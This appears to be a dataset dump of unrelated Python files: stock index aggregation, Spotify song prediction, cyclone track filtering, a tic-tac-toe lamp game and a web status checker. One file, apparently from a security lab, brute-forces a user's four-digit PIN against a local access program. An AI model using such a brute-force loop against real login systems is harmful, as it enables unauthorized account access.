self).__init__()\n self.x = x\n self.y = y\n\n def dist(self, other):\n assert isinstance(other, Point)\n \n xd = self.x - other.x\n yd = self.y - other.y\n return math.sqrt( xd**2 + yd**2 )\n\n def __str__(self):\n return \"{},{}\".format(self.x, self.y)\n\n @classmethod\n def from_str(cls, s):\n x,y = map(int, s.split(','))\n return cls(x,y)\n \n\ndef precision_recall(pred_dict, truth_dict, R, N_classes=4):\n \"\"\" returns a N_classes x 3 matrix where the rows correspond to classes\n and the cols correspond to the counts of [correct, predicted, actual]\n \"\"\"\n output = np.zeros((N_classes, 3))\n\n # count true\n for label in truth_dict.values():\n output[label,2] += 1\n\n # count predicted\n for label in pred_dict.values():\n output[label,1] += 1\n\n # load predictions into dict by label\n predictions_by_label = defaultdict(set)\n for coords, label in pred_dict.iteritems():\n pt = Point.from_str(coords)\n predictions_by_label[label].add(pt)\n\n # count correct\n # iterate over true points\n # for each, see if there's a nearby\n # prediction that matches the label\n for coords, label in truth_dict.iteritems():\n pt = Point.from_str(coords)\n\n #print \"Looking for {} near {}\".format(label, pt)\n\n for pred in predictions_by_label[label]:\n #print \"\\tTrying {}\\t{:07.1} away\".format(pred, pt.dist(pred))\n if pt.dist(pred) <= R:\n #print \"Found a correct\"\n output[label,0] += 1\n break\n\n return output\n\ndef partition_based_on_correctness(pred_dict, truth_dict, R):\n ''' given two dictionaries of points, one true, and one predicted,\n this function partitions the predicted points into \"correct\"\n and \"incorrect\" sets for each class.\n '''\n gt_by_label = defaultdict(set)\n for coords, label in truth_dict.iteritems():\n pt = Point.from_str(coords)\n gt_by_label[label].add(pt)\n\n cor_preds_by_label = defaultdict(set)\n inc_preds_by_label = defaultdict(set)\n for coords, label in pred_dict.iteritems():\n pt = Point.from_str(coords)\n\n for truth in gt_by_label[label]:\n if truth.dist(pt) < R:\n cor_preds_by_label[label].add(pt)\n continue\n if pt not in cor_preds_by_label[label]:\n inc_preds_by_label[label].add(pt)\n\n correct = {}\n incorrect = {}\n for label in cor_preds_by_label:\n for pt in cor_preds_by_label[label]:\n correct[str(pt)] = label\n\n for label in inc_preds_by_label:\n for pt in inc_preds_by_label[label]:\n 
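# --- Side note as code (illustrative, standalone): datetime.fromisoformat() in Python
# versions before 3.11 rejects a trailing 'Z', which is why the news cog above strips it;
# replacing 'Z' with '+00:00' keeps the value timezone-aware instead of naive.
from datetime import datetime, timezone

stamp = "2021-03-04T12:30:00Z"
dt = datetime.fromisoformat(stamp.replace("Z", "+00:00"))
print(dt == datetime(2021, 3, 4, 12, 30, tzinfo=timezone.utc))   # True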
incorrect[str(pt)] = label\n\n return correct, incorrect\n","sub_path":"old/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191952911","text":"import subprocess\nfrom subprocess import run, Popen, PIPE, STDOUT\nfrom sys import exit\n\n# session = subprocess.Popen(['access.sh'], stdout=PIPE, stderr=PIPE)\n# stdout, stderr = session.communicate()\n\nfor i in range(10):\n for j in range(10):\n for k in range(10):\n p = Popen(['./access'], stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n guess = i*1000 + j*100 + k*10 + 8\n str_input = f'david\\n{guess}\\n'\n stdout = p.communicate(input=str.encode(str_input))[0]\n str_output = stdout.decode()\n print(str_output)\n if \"S\" in str_output: # S is in 'Success.' but not 'Incorrect.' # substring search unnecessarily slow but only 1000 combinations to check anyway\n print(f'Found david\\'s PIN: {guess}')\n exit(0)\n\n# if didn't find pin, we failed\nexit(1)\n","sub_path":"lab0/break.py","file_name":"break.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335786063","text":"import sys\ndef convert(cel):\n # calculate fahrenheit\n fahrenheit = (cel * 1.8) + 32\n print('%0.1f degree Celsius = %0.1f degree Fahrenheit' % (cel, fahrenheit))\n\nif __name__ == '__main__':\n arg = sys.argv\n n = float(arg[1])\n convert(n)\n","sub_path":"code/celsius.py","file_name":"celsius.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188187023","text":"from python.Tracks.TracksDB import TracksDB\nimport xlsxwriter\nimport pandas as pd\n\nstart_year = 1979\nend_year = 2017 # 2011\n\nspawn_lat1 = 30\nspawn_lat2 = 38\nspawn_lon1 = 30\nspawn_lon2 = 38\n\nparent_zone_lon1 = 25\nparent_zone_lon2 = 45\n\nminimum_radius_48 = 350\n\nexcel_headlines = ['Date', 'Lat Daughter', 'Lon Daughter', 'Length', 'SLP Value', 'SLP Gradient',\n 'Radius', 'Max Radius 48', 'RST -6', 'Track Number']\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\ndays_in_month = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndf = pd.read_excel('C:/Users/hatzv/Documents/Geography/RSTs/python/Analysis/Results/RST_classification_all_hours_ERA_1979-2016.xlsx', 'Sheet')\n\n# counter = 0\nfinal_list = [excel_headlines]\nfor current_year in range(start_year, end_year+1):\n tr_db = TracksDB(current_year)\n total_tracks = tr_db.get_total_tracks()\n for current_track in range(total_tracks):\n track = tr_db.get_track(current_track)\n if len(track) >= 5: # 24 hours or longer tracks\n first_low = track[0]\n lat_first = tr_db.get_low_lat_degrees(first_low)\n lon_first = tr_db.get_low_lon_degrees(first_low)\n if (lat_first > spawn_lat1) and (lat_first < spawn_lat2) and (lon_first > spawn_lon1) and (lon_first < spawn_lon2): # Inside spawn area\n # Check for radius is first 48 hours. 
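# --- Illustrative follow-up (counts invented) to precision_recall() above: turning its
# per-class [correct, predicted, actual] matrix into precision and recall, guarding
# against division by zero for empty classes.
import numpy as np

counts = np.array([[8, 10, 9],     # class 0: 8 correct of 10 predicted, 9 actually present
                   [3,  4, 6]])    # class 1
precision = counts[:, 0] / np.maximum(counts[:, 1], 1)
recall    = counts[:, 0] / np.maximum(counts[:, 2], 1)
print(precision)   # approx [0.8  0.75]
print(recall)      # approx [0.889 0.5]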
Only those of which are larger han 350Km are used.\n start_radius = tr_db.get_low_radius(track[0])\n max_radius_48 = start_radius\n for low in range(min(len(track), 7)):\n low_num = track[low]\n if low_num > 0:\n radius = tr_db.get_low_radius(low_num)\n if radius > max_radius_48:\n max_radius_48 = radius\n if max_radius_48 >= minimum_radius_48: # Low gets deep enough\n # Find the RST classification 6 hours prior to the low.\n # print(counter)\n time_first_low = tr_db.get_low_time(first_low, return_format='string')\n hour = int(time_first_low[11:])\n day = int(time_first_low[8:10])\n month_int = int(time_first_low[5:7])\n month = months[month_int-1]\n year = int(time_first_low[0:4]) # Not the current_year because each DB file starts in YEAR and ends with YEAR+1\n if year < 2017:\n if hour == 0:\n hour = 18\n day -= 1\n if day == 0:\n month_int -=1\n if month_int == 0:\n day = days_in_month[-1]\n month = months[-1]\n year -= 1\n else:\n day = days_in_month[month_int-1]\n month = months[month_int-1]\n else:\n hour = hour - 6\n\n rst_class_minus_6 = df[(df['Month'] == month) & (df['Day'] == day) & (df['Hour'] == hour)][year]\n rst_class_minus_6 = rst_class_minus_6.get_values()[0]\n if type(rst_class_minus_6) is not str: # In case the date is 1st of March, in which case we look for Feb 28\n rst_class_minus_6 = df[(df['Month'] == month) & (df['Day'] == day-1) & (df['Hour'] == hour)][year]\n rst_class_minus_6 = rst_class_minus_6.get_values()[0]\n\n if rst_class_minus_6 != \"No RST\":\n slp_first = tr_db.get_low_lon_slp_value(first_low)\n gradient_first = tr_db.get_low_gradient(first_low)\n radius_first = tr_db.get_low_radius(first_low)\n track_length = len(track)\n final_list.append([time_first_low, lat_first, lon_first, track_length, slp_first,\n gradient_first, radius_first, max_radius_48, rst_class_minus_6, current_track])\n\n # counter += 1\n\n# Create an new Excel file and add a worksheet.\nworkbook = xlsxwriter.Workbook('RST_lows_after_RST.xlsx')\nworksheet = workbook.add_worksheet()\n\ntotal_cols = len(final_list[1])\nfor row in range(len(final_list)):\n for col in range(total_cols):\n worksheet.write(row, col, final_list[row][col])\n\n# Add a format. Light red fill with dark red text.\nformat1 = workbook.add_format({'bg_color': '#FFC7CE',\n 'font_color': '#9C0006'})\n\n# # Add a format. 
Green fill with dark green text.\n# format2 = workbook.add_format({'bg_color': '#C6EFCE',\n# 'font_color': '#006100'})\n\n# Write a conditional format over a range.\nworksheet.conditional_format('L1:L'+str(len(final_list)), {'type': 'cell',\n 'criteria': '>=',\n 'value': 10,\n 'format': format1})\n\nworkbook.close()\n","sub_path":"python/Tracks/find_lows_spawned_after_an_RST.py","file_name":"find_lows_spawned_after_an_RST.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51810809","text":"#!/usr/bin/python\n# Python 2.7.4\n\n# Module: Color Library Module\n# Author: Unknown\n# Date: June 15, 2014\n\n__author__ = \"BlackSuitIT\"\n__author_email__ = \"Unknown\"\n__date__ = \"06-15-2014\"\n__version__ = \"0.0.2\"\n\nMODULE = {\n 'NAME' :'colors ', # Mod file name\n 'DESC' :'Creates a color class', # Mod descripton \n 'TYPE' :'CLASS', # Class\n }\n\n\n# Color Class\nclass col:\n header = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n yellow = '\\033[93m'\n red = '\\033[91m'\n clear = '\\033[0m'\n\n# Class import message\nprint('COLORS module\\t\\t\\t\\t' + col.blue + '[' + col.green + 'ok' + col.blue + '] ' + col.clear)\n","sub_path":"colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308019728","text":"#coding=utf-8\n#author=godpgf\nfrom .data_accessor import LocalDataProxy\nfrom .code_accessor import LocalCodeProxy\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ndef cal_market_data(stock_list):\n all_weight = 0\n weight_list = []\n for s in stock_list:\n data = s.bar\n cup = data[-1][4] * s.totals\n all_weight += cup\n weight_list.append(cup)\n if all_weight > 0:\n for i in range(len(weight_list)):\n weight_list[i] /= all_weight\n\n date = []\n open = []\n high = []\n low = []\n close = []\n volume = []\n turnover = []\n\n day_len = len(stock_list[0].bar)\n yestoday_is_use = [False] * len(stock_list)\n for i in range(day_len):\n openPrice = 0\n highPrice = 0\n lowPrice = 0\n closePrice = 0\n volumeValue = 0\n\n #先计算今天的开盘\n realOpenPrice = None\n if i > 0:\n #先用昨天有数据今天还有数据的股票计算出今天的开盘价\n lastOpenPrice = 0\n for j in range(len(stock_list)):\n if yestoday_is_use[j] and stock_list[j].bar[i][5] > 0:\n lastOpenPrice += stock_list[j].bar[i-1][1] * weight_list[j]\n openPrice += stock_list[j].bar[i][1] * weight_list[j]\n\n if lastOpenPrice != 0:\n realOpenPrice = openPrice * open[i-1] / lastOpenPrice\n else:\n #当遇到计算不出的情况取个近似\n realOpenPrice = close[i-1]\n openPrice = 0\n\n\n #计算为了得到这个开盘价所需要的缩放\n for j in range(len(stock_list)):\n yestoday_is_use[j] = False\n if stock_list[j].bar[i][5] > 0:\n openPrice += stock_list[j].bar[i][1] * weight_list[j]\n highPrice += stock_list[j].bar[i][2] * weight_list[j]\n lowPrice += stock_list[j].bar[i][3] * weight_list[j]\n closePrice += stock_list[j].bar[i][4] * weight_list[j]\n volumeValue += stock_list[j].bar[i][5] * weight_list[j]\n yestoday_is_use[j] = True\n\n if realOpenPrice:\n if volumeValue == 0:\n openPrice = close[i-1]\n highPrice = close[i-1]\n lowPrice = close[i-1]\n closePrice = close[i-1]\n else:\n k = realOpenPrice / openPrice\n openPrice *= k\n highPrice *= k\n lowPrice *= k\n closePrice *= k\n volumeValue *= k\n\n date.append( stock_list[0].bar[i][0] )\n open.append( openPrice )\n high.append( highPrice )\n low.append( lowPrice )\n close.append( closePrice )\n volume.append( volumeValue )\n 
turnover.append(0.0)\n\n\n stocktype = np.dtype([\n ('date', 'uint64'), ('open', 'float32'),\n ('high', 'float32'), ('low', 'float32'),\n ('close', 'float32'), ('price', 'float32'),\n ('volume', 'uint64'), ('turnover', 'float32')\n ])\n history_data = [(date[i], open[i], high[i], low[i], close[i], 0, volume[i], 0) for i in range(len(date))]\n return np.array(history_data, dtype=stocktype)\n\n\nclass StockData(object):\n def __init__(self, bar, market, industry, totals = 1, earning_ratios = 0):\n self.bar = bar\n self.market = market\n self.industry = industry\n self.totals = totals\n self.earning_ratios = earning_ratios\n\n\ndef download_stock_data(cache_path=\"data\", is_offline=False, min_date=\"2012-01-01\", is_real_time=False):\n codeProxy = LocalCodeProxy(cache_path, is_offline)\n codes = codeProxy.get_codes()\n dataProxy = LocalDataProxy(cache_path, is_offline, min_date)\n\n industry_map = {}\n markey_set = set()\n\n code_list = []\n price = []\n market = []\n industry = []\n days = []\n\n code_set = set()\n for index, row in codes.iterrows():\n if row[\"code\"] in code_set:\n continue\n code_set.add(row[\"code\"])\n data = dataProxy.get_all_data(row[\"code\"], is_real_time)\n if data is not None and len(data) > 0:\n code_list.append(row[\"code\"])\n price.append(row[\"price\"])\n market.append(row[\"market\"])\n markey_set.add(row['market'])\n industry.append(row[\"industry\"])\n days.append(dataProxy.get_trading_days(row[\"code\"]))\n dataProxy.get_all_data(row[\"market\"])\n if row[\"industry\"] not in industry_map:\n industry_map[row[\"industry\"]] = list()\n industry_map[row[\"industry\"]].append(StockData(data,\n row['market'],\n row['industry']))\n\n for key, value in industry_map.items():\n data = cal_market_data(value)\n df = pd.DataFrame({\"date\":data[\"date\"],\n \"open\":data[\"open\"],\n \"high\":data[\"high\"],\n \"low\":data[\"low\"],\n \"close\":data[\"close\"],\n \"volume\":data[\"volume\"],\n \"turnover\":data[\"turnover\"]}, columns=[\"date\",\"open\",\"high\",\"low\",\"close\",\"volume\",\"turn\"])\n code_list.append(key)\n price.append(data[\"close\"][-1])\n\n market.append(None)\n industry.append(key)\n days.append(len(data[\"date\"]))\n df.to_csv(\"%s/%s.csv\" % (cache_path, key), index=False)\n\n for market_code in markey_set:\n data = dataProxy.get_all_data(market_code)\n code_list.append(market_code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(None)\n days.append(dataProxy.get_trading_days(market_code))\n\n pd.DataFrame({\"code\": np.array(code_list),\n \"price\": np.array(price),\n \"market\": np.array(market),\n \"industry\": np.array(industry),\n \"days\": np.array(days)},\n columns=[\"code\", \"market\", \"industry\", \"price\", \"days\"]).to_csv('%s/%s.csv' % (cache_path, 'codes'), index=False)\n\n\ndef download_industry(code_list, market_code, path, min_date=\"2005-09-01\"):\n if not os.path.exists(path):\n os.mkdir(path)\n dataProxy = LocalDataProxy(path, min_date=min_date)\n price = []\n market = []\n industry = []\n days = []\n for code in code_list:\n data = dataProxy.get_all_data(code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(market_code)\n days.append(dataProxy.get_trading_days(code))\n\n if market_code:\n data = dataProxy.get_all_data(market_code)\n code_list.append(market_code)\n price.append(data['close'][-1])\n market.append(market_code)\n industry.append(None)\n days.append(dataProxy.get_trading_days(market_code))\n pd.DataFrame({\"code\": np.array(code_list),\n 
\"price\": np.array(price),\n \"market\": np.array(market),\n \"industry\": np.array(industry),\n \"days\":np.array(days)},\n columns=[\"code\", \"market\", \"industry\", \"price\", \"days\"]).to_csv('%s/%s.csv' % (path, 'codes'), index=False)","sub_path":"stdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150673125","text":"import pandas as pd\nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn import neighbors\nfrom sklearn import neural_network\nfrom sklearn.ensemble import RandomForestRegressor\nimport statsmodels.api as sm\nimport spotipy\nimport spotipy.util as util\nimport random\nimport csv\nimport private\nimport lyricsgenius\nimport textstat\nimport graphviz\n\ndef Train():\n columnNames = ['Name', 'Duration', 'Popularity', 'Key', 'Time Sig', 'Energy', 'Instrumentalness', 'Loudness', 'Tempo', 'LyricSimplicity', 'Sections', 'Singable']\n songs = pd.read_csv(r\"Resources\\TrainingData.csv\")\n trainingDataframe = DataFrame(songs, columns=columnNames)\n #scatterPlot(trainingDataframe)\n\n X = trainingDataframe[['Duration', 'Popularity', 'Key', 'Energy', 'Instrumentalness', 'Tempo', 'LyricSimplicity', 'Sections']]\n Y = trainingDataframe['Singable']\n\n regression = RandomForestRegressor(n_estimators=400, max_features=8, max_depth=None, min_samples_split=2)\n regression = regression.fit(X,Y)\n return regression\n\ndef Predict(regression):\n scope = 'user-library-read playlist-modify-public'\n token = util.prompt_for_user_token(private.spotifyUsername, scope, private.spotifyClientId, private.spotifyClientSecret, \"http://localhost\")\n spot = spotipy.Spotify(auth=token)\n\n if token:\n songUris = []\n playlist = spot.user_playlist_create(private.spotifyUserId, \"Singable\")\n while len(songUris) < 10:\n track = spot.current_user_saved_tracks(1, random.randint(0, 1268))\n song = track['items'][0]['track']\n \n # Don't want duplicate songs in this playlist\n if (song[\"uri\"] not in songUris):\n trackFeatures = spot.audio_features(song[\"uri\"])[0]\n trackAnalysis = spot.audio_analysis(song[\"uri\"])\n name = song[\"name\"]\n artist = song[\"artists\"][0][\"name\"]\n print(name)\n simplicity = LyricDifficulty(GetLyrics(name, artist))\n duration = song[\"duration_ms\"]\n popularity = song[\"popularity\"]\n key = trackFeatures[\"key\"]\n energy = trackFeatures[\"energy\"]\n instrumentalness = trackFeatures[\"instrumentalness\"]\n loudness = trackFeatures[\"loudness\"]\n tempo = trackFeatures[\"tempo\"]\n sections = len(trackAnalysis[\"sections\"])\n\n prediction = regression.predict([[duration, popularity, key, energy, instrumentalness, tempo, simplicity, sections]])\n # Checking for prediction confidence. 
> 60% and we'll add it to the playlist \n if (float(prediction[0]) > 0.60):\n songUris.append(song[\"uri\"])\n print(name + \" Prediction: \" + str(prediction))\n spot.user_playlist_add_tracks(private.spotifyUserId, playlist[\"id\"], songUris)\n\ndef scatterPlot(dataFrame):\n plt.scatter(dataFrame['Simplicity'], dataFrame['Singable'], color='red')\n plt.title(\"Simple VS Singable\", fontsize=14)\n plt.xlabel(\"Simple\", fontsize=14)\n plt.ylabel(\"Singable\")\n plt.grid(True)\n plt.show()\n\ndef ScrapeSongs():\n scope = 'user-library-read'\n token = util.prompt_for_user_token(private.spotifyUsername, scope, private.spotifyClientId, private.spotifyClientSecret, \"http://localhost\")\n\n if token:\n spot = spotipy.Spotify(auth=token)\n\n # We're grabbing 200 songs total, in batches of 5\n with open(\"TrainingData.csv\", \"w+\", newline='') as file:\n for i in range(0, 40):\n songUris = []\n totalSongs = spot.current_user_saved_tracks(1,0)[\"total\"]\n results = spot.current_user_saved_tracks(5, random.randint(0, totalSongs)) # 1268 is the total amount of songs I have, need to find a way to get this number dynamically\n\n for item in results['items']:\n if (item[\"track\"][\"uri\"] not in songUris):\n songUris.append(item['track']['uri'])\n tracks = spot.tracks(songUris)['tracks']\n trackFeatures = spot.audio_features(songUris)\n\n for i in range(0, len(tracks)):\n trackAnalysis = spot.audio_analysis(songUris[i])\n trackInfo = []\n trackInfo.append(tracks[i][\"name\"])\n trackInfo.append(tracks[i][\"duration_ms\"])\n trackInfo.append(tracks[i][\"popularity\"])\n trackInfo.append(trackFeatures[i][\"key\"])\n trackInfo.append(trackFeatures[i][\"time_signature\"])\n trackInfo.append(trackFeatures[i][\"energy\"])\n trackInfo.append(trackFeatures[i][\"instrumentalness\"])\n trackInfo.append(trackFeatures[i][\"loudness\"])\n trackInfo.append(trackFeatures[i][\"tempo\"])\n trackInfo.append(LyricDifficulty(GetLyrics(tracks[i][\"name\"], tracks[i][\"artists\"][0][\"name\"])))\n trackInfo.append(len(trackAnalysis[\"sections\"]))\n writer = csv.writer(file, delimiter=\",\")\n writer.writerow(trackInfo)\n print(len(songUris))\n\ndef GetLyrics(songName, songArtist):\n try:\n genius = lyricsgenius.Genius(private.geniusAccessToken)\n song = genius.search_song(songName, songArtist)\n if (song is not None):\n return song.lyrics\n return None\n except:\n return None\n\ndef LyricDifficulty(lyrics):\n if (lyrics is not None):\n return textstat.flesch_reading_ease(lyrics)\n return 0\n\n\nregression = Train()\nPredict(regression)\n#ScrapeSongs()\n#print(LyricDifficulty(GetLyrics(\"Hunter\", \"Tonedeff\")))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"530830767","text":"\nimport random\nimport sys\nimport time\n\nimport http.client\nimport tornado.escape\n\nfrom PyQt4 import QtGui, QtCore\n\nimport playhouse\n\n\nbuttons = [[None] * 3 for _ in range(3)]\n\nbuffer = []\ndef set_state(x, y, **args):\n global buffer\n buffer += [{'x':x, 'y':y, 'change':args}]\n\ndef commit():\n global buffer\n conn = http.client.HTTPConnection(\"localhost:4711\")\n conn.request(\"POST\", \"/lights\", tornado.escape.json_encode(buffer))\n buffer = []\n\ndef main():\n for i in range(3):\n for j in range(3):\n set_state(i, j, sat=0, hue=0, bri=0)\n commit()\n \n app = QtGui.QApplication(sys.argv)\n \n window = QtGui.QMainWindow()\n window.setWindowTitle(\"Tic tac toe\")\n \n widget = 
QtGui.QWidget()\n widget.setStyleSheet(\"QPushButton { color: black }\")\n layout = QtGui.QGridLayout()\n \n for row in range(3):\n for column in range(3):\n def clicked(row, column):\n def action():\n do_turn(column, row)\n return action\n \n button = QtGui.QPushButton(\"{}:{}\".format(row, column))\n button.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n button.clicked.connect(clicked(row, column))\n button.setStyleSheet(\"QPushButton { background-color: white }\")\n buttons[row][column] = button\n layout.addWidget(button, row, column)\n \n widget.setLayout(layout)\n window.setCentralWidget(widget)\n \n window.show()\n \n app.exec()\n\n\n# ====== #\n\nplayer = 0\ncolors = [0, 45000]\nbutton_colors = [\"red\", \"blue\"]\n\nboard = [[-1, -1, -1],\n [-1, -1, -1],\n [-1, -1, -1]]\n\ntimer_running = False\n\ndef reset():\n global player, board, timer_running\n timer_running = False\n \n for i in range(3):\n for j in range(3):\n set_state(i, j, hue=0, sat=0)\n buttons[j][i].setStyleSheet(\"QPushButton { background-color: white }\")\n commit()\n board = [[-1, -1, -1],\n [-1, -1, -1],\n [-1, -1, -1]]\n player = 0\n\ndef do_turn(x, y):\n global player, timer_running\n if board[y][x] != -1 or timer_running:\n return\n board[y][x] = player\n set_state(x, y, hue=colors[player], sat=255)\n commit()\n buttons[y][x].setStyleSheet(\"QPushButton {{ background-color: {} }}\".format(button_colors[player]))\n \n winner_lamps = set()\n for configuration in [[(y, 0), (y, 1), (y, 2)],\n [(0, x), (1, x), (2, x)],\n [(0, 0), (1, 1), (2, 2)],\n [(0, 2), (1, 1), (2, 0)]]:\n if all(board[i][j] == player for i, j in configuration):\n winner_lamps.update(configuration)\n \n if len(winner_lamps) > 0:\n def set_alert():\n for i, j in winner_lamps:\n set_state(j, i, alert=\"lselect\")\n commit()\n QtCore.QTimer.singleShot(500, set_alert)\n timer_running = True\n QtCore.QTimer.singleShot(5000, reset)\n return\n if all(all(i != -1 for i in j) for j in board):\n reset()\n return\n \n player = 1 - player\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561441926","text":"from datetime import datetime as dt\nfrom sys import _getframe as gf\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nclass URLHandler(object):\n\n\tdef __init__(self,cfg_file,log,debug): # added debug \n\t\tself.min_h = cfg_file[\"urls_settings\"][\"lower_time_range\"][0]\n\t\tself.min_m = cfg_file[\"urls_settings\"][\"lower_time_range\"][1]\n\t\tself.min_s = cfg_file[\"urls_settings\"][\"lower_time_range\"][2]\n\n\t\tself.max_h = cfg_file[\"urls_settings\"][\"upper_time_range\"][0]\n\t\tself.max_m = cfg_file[\"urls_settings\"][\"upper_time_range\"][1]\n\t\tself.max_s = cfg_file[\"urls_settings\"][\"upper_time_range\"][2]\n\n\t\tself._log_buffer = list() # pushing msg for log inhere\n\t\tself._table_indices = cfg_file[\"table_indices\"]\n\t\tself._cfg = cfg_file\n\t\tself._log = log\n\t\tself._OK = True\n\t\tself.d = debug \n\t\n\tdef isOK(self):\n\t\t\"\"\" Return overall status for emails \"\"\"\n\t\treturn self._OK\n\n\tdef is_time_in_range(self,x):\n\t\tstart = dt.today().replace(hour=self.min_h,minute=self.min_m,second=self.min_s).timestamp()\n\t\tend = dt.today().replace(hour=self.max_h,minute=self.max_m,second=self.max_s).timestamp()\n\t\ts = x.strip().split(\" \")\n\t\tif '' in s:\n\t\t\ts.remove('')\n\t\ts1 = \"{} 
{}, {} {}\".format(s[1],s[2],s[4],s[3])\n\t\tx = dt.strptime(s1, \"%b %d, %Y %H:%M:%S\").timestamp()\n\t\treturn True if start < x and x < end else False\n\t\n\tdef flowstream_check(self,inst_cnt, str_time):\n\t\t\"\"\" Returns the status for Primary and Secondary Flowstream \"\"\"\n\t\treturn inst_cnt == \"1\" and self.is_time_in_range(str_time)\n\n\tdef wombat_check(self,lines_cnt):\n\t\t\"\"\" Returns the status for Wombat on market data consumption \"\"\"\n\t\treturn lines_cnt in self._table_indices[\"wombat\"][\"check\"]\n\n\tdef subscription_check(self,status):\n\t\t\"\"\" Returns cache status\"\"\"\n\t\treturn status in self._table_indices[\"rai_cache\"][\"check\"]\n\n\tdef raptor_ibm_check(self,status):\n\t\t\"\"\" Returns status for IBM and Raptor connections \"\"\"\n\t\treturn status in self._table_indices[\"ibm_rap_links\"][\"check\"]\n\n\tdef process_req(self):\n\t\tr = \"\" # request\n\t\tself.d.write(\" Line {} - Entering process_req(..)\\n\".format(gf().f_lineno),\"a\")\n\t\tfor i in self._cfg[\"urls\"]:\n\t\t\tif isinstance(self._cfg['urls'][i],str):\n\t\t\t\ttry:\n\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> FIRST 'try' block\\n\".format(gf().f_lineno),\"a\")\n\t\t\t\t\tr = get(self._cfg[\"urls\"][i])\n\t\t\t\t\tpage = BeautifulSoup(r.text, 'html.parser')\t\n\t\t\t\t\ttable = page.find_all(\"table\")\t\n\t\t\t\t\t# return iterator on rows and pass it to analyze(..)\t\n\t\t\t\t\t# 3 = table index; our page has 4 tables; our value is in the last one\t\t\n\t\t\t\t\trows = iter(table[3].find_all(\"tr\")) \n\t\t\t\t\tx = self.analyze(rows,i)\n\t\t\t\t\tif x[0]:\n\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < OK > \".ljust(15) + self._cfg[\"urls\"][i]\n\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < ERROR > \".ljust(15) + self._cfg[\"urls\"][i]\n\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\tself._OK = False\n\t\t\t\texcept BaseException as e:\n\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> Exception in FIRST 'try'\\n {}\".format(gf().f_lineno,e),\"a\")\n\t\t\telse:\n\t\t\t\tfor j in self._cfg['urls'][i]:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> SECONDS 'try' block\\n\".format(gf().f_lineno),\"a\")\n\t\t\t\t\t\tr = get(j)\n\t\t\t\t\t\tpage = BeautifulSoup(r.text, 'html.parser')\t\n\t\t\t\t\t\ttable = page.find_all(\"table\")\t\t\n\t\t\t\t\t\trows = iter(table[3].find_all(\"tr\")) \n\t\t\t\t\t\tx = self.analyze(rows,j)\n\t\t\t\t\t\tif x[0]:\n\t\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < OK > \".ljust(15) + j\n\t\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlog_msg = x[1].ljust(25) + \" < ERROR > \".ljust(15) + j\n\t\t\t\t\t\t\tself._log_buffer.append(log_msg + \"\\n\")\n\t\t\t\t\t\t\tself._OK = False\n\t\t\t\t\texcept BaseException as e:\n\t\t\t\t\t\tself.d.write(\" Line {} - process_req(..), >> Exception in SECONDS 'try'\\n {}\".format(gf().f_lineno,e),\"a\")\n\t\tself._dump_log()\n\n\tdef analyze(self,row_iter, url_tag):\n\t\t\"\"\" Returns check result for each individual row \"\"\"\n\t\tself.d.write(\" Line {} - Entering analyze(..)\\n\".format(gf().f_lineno),\"a\")\n\t\tnext(row_iter)\n\t\tprime_cnt = 0\n\t\tfor row in row_iter:\n\t\t\tcells = [x.string.strip() for x in row.find_all(\"td\")]\n\t\t\tif url_tag == \"flowstream_prime\":\n\t\t\t\tif cells[0] in self._table_indices[url_tag][\"check\"]:\n\t\t\t\t\tcnt = cells[1] # instanceCount \n\t\t\t\t\ttime = cells[8] # startTime \n\t\t\t\t\tstat 
